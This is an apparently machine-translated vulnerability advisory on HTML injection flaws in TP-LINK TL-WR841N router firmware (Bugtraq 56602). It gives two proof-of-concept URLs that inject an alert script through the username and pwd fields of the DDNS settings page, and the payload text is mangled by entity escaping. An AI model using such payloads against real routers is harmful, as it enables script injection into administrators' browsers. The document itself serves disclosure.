Multiple HTML injection vulnerabilities in TP-LINK TL-WR841N Routers

Multiple HTML injection vulnerabilities in TP-LINK TL-WR841N Routers

Release date:
Updated on:

Affected Systems:
TP-LINK TL-WR841N 3.13.9 Build 120201 Rel.54965n
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56602

TP-LINK TL-WR841N is a wireless router.

TP-LINK TL-WR841N 3.13.9 Build 120201 Rel.54965n and other versions have multiple HTML injection vulnerabilities that attackers can exploit to execute arbitrary script code in the user browser of the affected site.

<* Source: Matan Azugi
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Http://www.example.com/userRpm/NoipDdnsRpm.htm?

Provider = 3 & amp; username = a1234 & amp; lt;/script & amp; gt; & amp; lt; script & amp; gt; alert (1)

& Amp; lt;/script & amp; gt; 12aaa34f5be & amp; pwd = password & amp; cliUrl = & amp; Save = Save

Http://www.example.com/userRpm/NoipDdnsRpm.htm?

Provider = 3 & amp; username = 1234 & amp; pwd = a1234 & amp; lt;/script & amp; gt; & amp; lt; script & amp; gt; alert (1)

& Amp; lt;/script & amp; gt; 12aaa34f5be & amp; cliUrl = & amp; Save = Save

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

TP-LINK
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.tp-link.com/products/